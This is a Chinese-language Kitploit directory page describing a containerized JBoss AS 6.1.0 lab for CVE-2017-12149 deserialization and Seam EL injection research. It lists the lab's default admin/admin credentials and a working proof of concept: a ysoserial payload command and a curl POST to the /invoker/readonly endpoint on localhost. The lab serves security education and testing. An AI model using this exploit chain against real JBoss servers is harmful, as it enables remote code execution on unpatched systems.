Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
cve-2017-12149-playground — 容器化的 JBoss AS 6.1.0 研究实验室,用于演示 Java 反序列化(CVE-2017-12149)和 JBoss Seam EL 注入漏洞,并包含预配置的漏洞利用验证步骤。 | Kitploit
工具/GitHubGitHub/galois17/cve-2017-12149-playground
容器安全漏洞分析Web应用程序漏洞利用渗透测试学习与教育二进制利用
GitHubgalois17/cve-2017-12149-playground

cve-2017-12149-playground

容器化的 JBoss AS 6.1.0 研究实验室,用于演示 Java 反序列化(CVE-2017-12149)和 JBoss Seam EL 注入漏洞,并包含预配置的漏洞利用验证步骤。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
48个月前尚未审核

许多关键行业(银行业、医疗保健和制造业)仍然依赖专为 JBoss 5 或 6 运行而构建的遗留中间件。由于这些应用程序往往过于脆弱,无法迁移到 WildFly(JBoss 的继任者)的现代版本,组织选择将其"物理隔离"(air-gap)或隐藏在 VPN 之后,而不是对它们进行修补。当这些边界防御失效时,漏洞仍然存在——活跃且未修补。

JBoss AS 6.1.0 漏洞研究实验室

本仓库提供了一个容器化的 JBoss Application Server 6.1.0 环境,专门为安全研究和漏洞验证而配置。其设计目的是演示 Java 反序列化和 JBoss Seam EL 注入漏洞。


快速开始

1. 构建与启动

为确保自定义凭据和配置正确生效,请从头构建容器:

root@kitploit:~
docker-compose build --no-cache
docker-compose up -d

2. 访问环境

JBoss 控制台: http://localhost:8080/admin-console/

用户名: admin

密码: admin

已验证的漏洞

1. Java 反序列化 (CVE-2017-12149)

在此环境中,最可靠的漏洞利用路径是通过位于 /invoker/readonly 的 HTTPServerILServlet。

验证步骤:

使用 ysoserial 生成一个载荷,以在 /tmp 中创建文件:

root@kitploit:~
java -jar ysoserial-all.jar CommonsCollections6 "touch /tmp/pwned" > poc.ser

通过 curl 发送二进制载荷:

root@kitploit:~
curl -v -X POST --data-binary @poc.ser http://localhost:8080/invoker/readonly

确认漏洞利用是否成功:

root@kitploit:~
docker exec -it jboss-custom-lab ls /tmp/pwned

安全免责声明 此环境故意带有漏洞。它包含未修补的、生命周期已结束(EOL)的软件。

请勿将此环境部署在面向公网的服务器上。

请勿将这些工具用于未经明确许可进行测试的系统上。

本项目仅用于教育目的和安全研究。

依赖项: https://github.com/frohoff/ysoserial

下载工具